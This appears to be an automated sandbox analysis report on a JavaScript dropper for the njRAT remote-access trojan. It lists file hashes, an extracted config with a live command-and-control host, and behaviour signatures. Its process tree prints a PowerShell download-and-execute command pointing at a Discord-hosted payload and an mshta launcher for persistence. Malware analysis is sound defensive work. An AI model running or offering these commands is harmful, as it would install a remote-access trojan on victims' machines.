Overview

overview

10

Static

static

34ce23e0ca...436.js

windows7_x64

10

34ce23e0ca...436.js

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    02-12-2021 03:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    34ce23e0cac1eb85e253f52b87c53436.js

  • Size

    256B

  • MD5

    34ce23e0cac1eb85e253f52b87c53436

  • SHA1

    fbc026960fc1009eae89f7506276a5e153ec58ec

  • SHA256

    ba2680549e33524c3b96c4b2be01c47297e977fe7532034936d8baa4f6dc3104

  • SHA512

    488b7d7cc0a3a723273f4bac17f4b45daa9c894d03af15b6c14e84d9f9b4ee3fa7d263b03fb3c12c78361a4a9d92b77a6e7a25e323b9494e937ba1ca6be92c9d

Score
10/10
njratnyan cattrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

yuni2022.duckdns.org:2000

Mutex

4ab2234479534

Attributes
  • reg_key

    4ab2234479534

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\34ce23e0cac1eb85e253f52b87c53436.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass iex ((New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/908377323814916189/915315815404953630/yuniiii.txt'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3136
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:604
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2092
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1092
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3124

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    010c219c46b4439bc787644989e20389

    SHA1

    f3a63066ab4446458bd6417386777e39e09b9b25

    SHA256

    2a7c264d94398912c720de578b6d959b2457582182b8f2cc98281f27ef6701aa

    SHA512

    c6967d2a37b9a45f491138b638d99e5fa09ef38f680c887bfbc2336c683deae86f4d6626f6defc8c0aabccf545923a708df05825de8102086a8f333a58e74963

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    92732f310f023847805d5093d511fc2a

    SHA1

    6a8d6d3777636158f73d8b2b6e3305cd7d2b2b67

    SHA256

    10f5222288c88c706924555c2a0534e4ca24edb876d59398336a1c8b0c013d10

    SHA512

    ee5fee7a51ae5e1399995feef8cfc345d3de1bf6bd889612dff6a348d0741e813a1e1f029574467a9b8c70eeecaa64ca884fb3722b424fcf6c8961d60c658897

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5

    558a8b7b3fdef4ca79110f8cfd126694

    SHA1

    d6e96ca27f701b3f4c24885dacd14c762a9d36b0

    SHA256

    38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

    SHA512

    37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

    Download Submit
  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5

    7f85382953fde20b101039d48673dbd2

    SHA1

    5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

    SHA256

    fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

    SHA512

    6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

    Download Submit
  • C:\Users\Public\myScript.ps1
    MD5

    b7ce758a456d759c9c8d9d165de473bc

    SHA1

    eb07b9f9a21b12945cd461d970b925698183b8f5

    SHA256

    0d44b8e8222a09eecef416a78409757ac190eae8bd7c0ceb2880791eedeec295

    SHA512

    8c239aa579b8e3875a271a730755c8ee2f83ac72b248270090a8bc025850ac2bd81100dac6118935a10ab686f7e295d599ee99a94779446db5b9cc30110cea04

    Download Submit
  • memory/604-152-0x0000000000000000-mapping.dmp
    Download
  • memory/1092-171-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-165-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-180-0x000001B7E99F0000-0x000001B7E99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-176-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-174-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-185-0x000001B7E9A96000-0x000001B7E9A98000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-159-0x0000000000000000-mapping.dmp
    Download
  • memory/1092-170-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-169-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-168-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-183-0x000001B7E9A90000-0x000001B7E9A92000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-184-0x000001B7E9A93000-0x000001B7E9A95000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-164-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-163-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-188-0x000001B7E9A00000-0x000001B7E9A05000-memory.dmp
    Filesize

    20KB

    Download
  • memory/1092-162-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-189-0x000001B7E9A10000-0x000001B7E9A13000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1092-190-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-161-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1092-193-0x000001B7E9210000-0x000001B7E9212000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1740-156-0x0000000000000000-mapping.dmp
    Download
  • memory/2092-157-0x0000000000000000-mapping.dmp
    Download
  • memory/2092-158-0x000002A47CED8000-0x000002A47CEE0000-memory.dmp
    Filesize

    32KB

    Download
  • memory/3124-199-0x00000000055B0000-0x00000000055B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-192-0x000000000040676E-mapping.dmp
    Download
  • memory/3124-191-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

    Download
  • memory/3136-125-0x000001B5F5AA0000-0x000001B5F5AA1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3136-122-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-134-0x000001B5F3830000-0x000001B5F3832000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-133-0x000001B5F3846000-0x000001B5F3848000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-132-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-129-0x000001B5F3843000-0x000001B5F3845000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-128-0x000001B5F3840000-0x000001B5F3842000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-126-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-141-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-124-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-123-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-135-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-121-0x000001B5F37D0000-0x000001B5F37D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3136-120-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-119-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-118-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-116-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-142-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-153-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-117-0x000001B5D99F0000-0x000001B5D99F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3136-115-0x0000000000000000-mapping.dmp
    Download